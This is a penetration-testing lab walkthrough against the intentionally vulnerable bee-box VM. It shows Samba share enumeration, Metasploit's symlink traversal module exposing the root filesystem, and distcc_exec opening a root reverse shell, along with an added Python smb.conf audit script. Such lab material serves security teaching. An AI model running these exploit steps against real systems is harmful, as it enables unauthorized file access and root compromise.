bWAPP's bee-box VM exposes a Samba file-sharing service with a module that allows reading and writing of arbitrary files on the remote host. Our goal is to exploit these vulnerabilities on the remote host using the Metasploit Framework.
Let's start with an nmap scan of the remote host's SMB ports.
root@ubuntu:~# nmap -sV -sC -p 139,445 -T4 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-06 15:39 MST
Nmap scan report for 192.168.56.101
Host is up (0.00034s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: ITSECGAMES)
MAC Address: 08:00:27:73:40:55 (Oracle VirtualBox virtual NIC)

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user:, NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: bee-box
|   NetBIOS computer name:
|   Domain name:
|   FQDN: bee-box
|_  System time: 2020-02-06T23:40:05+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.25 seconds
root@ubuntu:~#
We see that Samba is running and the service banner gives us its exact version, Samba 3.0.28a. The script output also shows that the guest account was accepted and that SMB message signing is disabled.
Next we query the Samba server to list its available shares.
sam@ubuntu:~$ smbclient -L //192.168.56.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password:
Anonymous login successful

	Sharename                                    Type      Comment
	---------                                    ----      -------
	print$                                       Disk      Printer Drivers
	tmp                                          Disk      oh noes!
	opt                                          Disk
	IPC$                                         IPC       IPC Service (bee-box server (Samba 3.0.28a))
	Xerox_Phaser_8500DN_PS:7                     Printer   Xerox Phaser 8500DN PS
	Snagit_9:6                                   Printer   Snagit 9
	Send_To_OneNote_2010:8                       Printer   Send To OneNote 2010
	PDF                                          Printer   PDF
	Microsoft_XPS_Document_Writer:1              Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5        Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4  Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2                                        Printer   Fax
	CutePDF_Writer:3                             Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX
sam@ubuntu:~$
As you can see, we have a few shares available to us. Let's take a look at two of them, opt and tmp.
sam@ubuntu:~$ smbclient //192.168.56.101/opt
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
sam@ubuntu:~$ smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
We were only able to access the tmp share without a password. Let's list the directory contents and see what's there.
smb: \> ls
  .                                   D        0  Thu Feb 6 14:55:28 2020
  ..                                  D        0  Thu Feb 6 14:02:39 2020
  pulse-bee                           D        0  Thu Feb 6 14:02:57 2020
  .X0-lock                           HR       11  Thu Feb 6 14:02:49 2020
  seahorse-yeRc1i                     D        0  Thu Feb 6 14:02:55 2020
  orbit-bee                           D        0  Thu Feb 6 14:03:11 2020
  .X11-unix                          DH        0  Thu Feb 6 14:02:49 2020
  .ICE-unix                          DH        0  Thu Feb 6 14:02:55 2020
  Tracker-bee.5866                    D        0  Thu Feb 6 14:03:10 2020
  virtual-bee.Dqh0Mw                  D        0  Thu Feb 6 14:03:03 2020
  .gdm7IYNF0                          H      118  Thu Feb 6 14:02:52 2020
  vmware-bee                          D        0  Thu Feb 6 14:03:00 2020
  keyring-aQbfLk                      D        0  Thu Feb 6 14:02:56 2020
  gconfd-bee                          D        0  Thu Feb 6 14:02:54 2020
  .X1-lock                           HR       11  Thu Feb 6 14:02:43 2020
  php.socket-0                        A        0  Thu Feb 6 14:02:52 2020
  .esd-1000                          DH        0  Thu Feb 6 14:02:57 2020
  php.socket-1                        A        0  Thu Feb 6 14:02:52 2020
  ssh-FpQxrU5427                      D        0  Thu Feb 6 14:02:53 2020
  tmp.gIGDje5481                      N        0  Thu Feb 6 14:02:52 2020

		19891060 blocks of size 1024. 15583076 blocks available
smb: \>
Not much here, just the temporary files held in the /tmp directory on the remote host. Let's move on to exploiting the Samba service.
Samba Symlink Directory Traversal
In Metasploit there are a few options we can use against the remote Samba service. One of them is the Samba symlink directory traversal auxiliary module, auxiliary/admin/smb/samba_symlink_traversal.
The module takes a share that anonymous users can write to, creates a new directory entry inside it, and links that entry to the root filesystem, so the whole root filesystem can be browsed from the writable share.
msf5 > use auxiliary/admin/smb/samba_symlink_traversal
msf5 auxiliary(admin/smb/samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf5 auxiliary(admin/smb/samba_symlink_traversal) > exploit
[*] Running module against 192.168.56.101

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.56.101:445 - Now access the following share to browse the root filesystem:
[*] 192.168.56.101:445 - 	\\192.168.56.101\tmp\rootfs\

[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/samba_symlink_traversal) >
Now let's reconnect to the //192.168.56.101/tmp share and check whether the newly created 'rootfs' entry is there so we can browse the root filesystem.
sam@ubuntu:~$ smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 6 14:42:00 2020
  ..                                  D        0  Thu Feb 6 14:02:39 2020
  pulse-bee                           D        0  Thu Feb 6 14:02:57 2020
  .X0-lock                           HR       11  Thu Feb 6 14:02:49 2020
  rootfs                              D        0  Thu Feb 6 14:02:39 2020
  seahorse-yeRc1i                     D        0  Thu Feb 6 14:02:55 2020
  orbit-bee                           D        0  Thu Feb 6 14:03:11 2020
  .X11-unix                          DH        0  Thu Feb 6 14:02:49 2020
  .ICE-unix                          DH        0  Thu Feb 6 14:02:55 2020
  Tracker-bee.5866                    D        0  Thu Feb 6 14:03:10 2020
  virtual-bee.Dqh0Mw                  D        0  Thu Feb 6 14:03:03 2020
  .gdm7IYNF0                          H      118  Thu Feb 6 14:02:52 2020
  vmware-bee                          D        0  Thu Feb 6 14:03:00 2020
  keyring-aQbfLk                      D        0  Thu Feb 6 14:02:56 2020
  gconfd-bee                          D        0  Thu Feb 6 14:02:54 2020
  .X1-lock                           HR       11  Thu Feb 6 14:02:43 2020
  php.socket-0                        A        0  Thu Feb 6 14:02:52 2020
  .esd-1000                          DH        0  Thu Feb 6 14:02:57 2020
  php.socket-1                        A        0  Thu Feb 6 14:02:52 2020
  ssh-FpQxrU5427                      D        0  Thu Feb 6 14:02:53 2020
  tmp.gIGDje5481                      N        0  Thu Feb 6 14:02:52 2020

		19891060 blocks of size 1024. 15583084 blocks available
smb: \> cd rootfs
The 'rootfs' entry is there. Let's cd into that directory and see what we have.
smb: \rootfs\> ls
  .                                   D        0  Thu Feb 6 14:02:39 2020
  ..                                  D        0  Thu Feb 6 14:02:39 2020
  bin                                 D        0  Thu Mar 28 13:15:46 2013
  tmp                                 D        0  Thu Feb 6 14:42:00 2020
  sys                                 D        0  Thu Feb 6 14:02:15 2020
  proc                               DR        0  Thu Feb 6 14:02:14 2020
  boot                                D        0  Thu Mar 28 14:23:01 2013
  etc                                 D        0  Thu Feb 6 14:02:59 2020
  opt                                 D        0  Tue Apr 22 11:48:59 2008
  media                               D        0  Tue Apr 22 11:48:59 2008
  toolbox                             D        0  Mon Apr 1 14:42:27 2013
  lib                                 D        0  Mon Apr 1 10:40:57 2013
  root                                D        0  Thu Feb 6 14:02:43 2020
  dev                                 D        0  Thu Feb 6 14:02:52 2020
  initrd                              D        0  Tue Apr 22 11:48:59 2008
  cdrom                               D        0  Thu Mar 28 13:09:30 2013
  var                                 D        0  Fri Apr 18 12:58:25 2014
  usr                                 D        0  Thu Mar 28 13:59:08 2013
  lost+found                          D        0  Thu Mar 28 13:09:28 2013
  lib64                               D        0  Thu Mar 28 13:59:09 2013
  home                                D        0  Thu Dec 12 05:03:56 2013
  vmlinuz                             N  1904248  Thu Apr 10 10:51:33 2008
  mnt                                 D        0  Thu Mar 28 14:22:34 2013
  srv                                 D        0  Tue Apr 22 11:48:59 2008
  initrd.img                          N  7475772  Thu Mar 28 14:23:00 2013
  sbin                                D        0  Thu Mar 28 19:15:39 2013

		19891060 blocks of size 1024. 15583084 blocks available
smb: \rootfs\>
As you can see, the root filesystem is right there and we can now browse it through the anonymous tmp share.
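As an added defender-side check (my example, not code from the post or from Metasploit): the module above only works when a client can write to the share and Samba follows the planted symlink out of the share tree, the 'wide links' behaviour that later Samba releases turned off by default and force off whenever 'unix extensions' is on. The script parses a constructed smb.conf modelled on the shares seen earlier and reports the shares where that combination is still present; the file, its contents and the 'legacy' approximation of the unpatched 3.0.x defaults are my assumptions.

```python
import re
# Constructed smb.conf modelled on the shares listed above (writable guest
# 'tmp', read-only 'opt'); assumed for illustration, not bee-box's real file.
SAMPLE_SMB_CONF = """\
[global]
   unix extensions = no   ; must be off for 'wide links' to take effect
   wide links = yes       ; server follows symlinks that leave the share tree
[tmp]
   writable = yes
[opt]
   read only = yes
"""

def parse_smb_conf(text):
    # Return {section: {param: value}} with names and values lowercased.
    sections, current = {}, None
    for raw in text.splitlines():
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()  # strip comments
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, val = line.partition("=")
            sections[current][" ".join(key.lower().split())] = val.strip().lower()
    return sections

def setting(conf, share, *names):
    """Boolean for a parameter or its synonyms (share, then [global]); None if unset."""
    for scope in (conf.get(share, {}), conf.get("global", {})):
        for name in names:
            if name in scope:
                return scope[name] in ("yes", "true", "1")
    return None

def traversal_exposed(conf, share, legacy=False):
    """True when a client can plant a symlink in the share and the server follows it
    out of the share tree; legacy=True models pre-fix 3.0.x builds like 3.0.28a."""
    writable = setting(conf, share, "writable", "writeable", "write ok")
    if writable is None:                          # otherwise via 'read only' (default yes)
        writable = setting(conf, share, "read only") is False
    if not writable or setting(conf, share, "follow symlinks") is False:
        return False
    if not legacy and setting(conf, share, "unix extensions") is not False:
        return False                              # patched Samba forces wide links off
    wide = setting(conf, share, "wide links")     # patched default: no; pre-fix: yes
    return legacy if wide is None else wide

def audit(text, legacy=False):
    conf = parse_smb_conf(text)
    return sorted(s for s in conf if s != "global" and traversal_exposed(conf, s, legacy))
```

Running audit(SAMPLE_SMB_CONF) reports only 'tmp'; the same file with 'unix extensions = yes' or 'wide links = no' reports nothing, which is the fix to apply on the server side.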
DistCC Daemon Command Execution
Metasploit offers us another route to exploitation: the DistCC Daemon Command Execution module, exploit/unix/misc/distcc_exec. This exploit allows anyone to execute arbitrary commands on a system running distccd.
msf5 exploit(linux/samba/trans2open) > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   3632             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5M8mmJmsD4wodODT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "5M8mmJmsD4wodODT\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:33553) at 2020-02-06 14:47:26 -0700

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
As you can see, we are root and have a shell on the remote system via the DistCC daemon.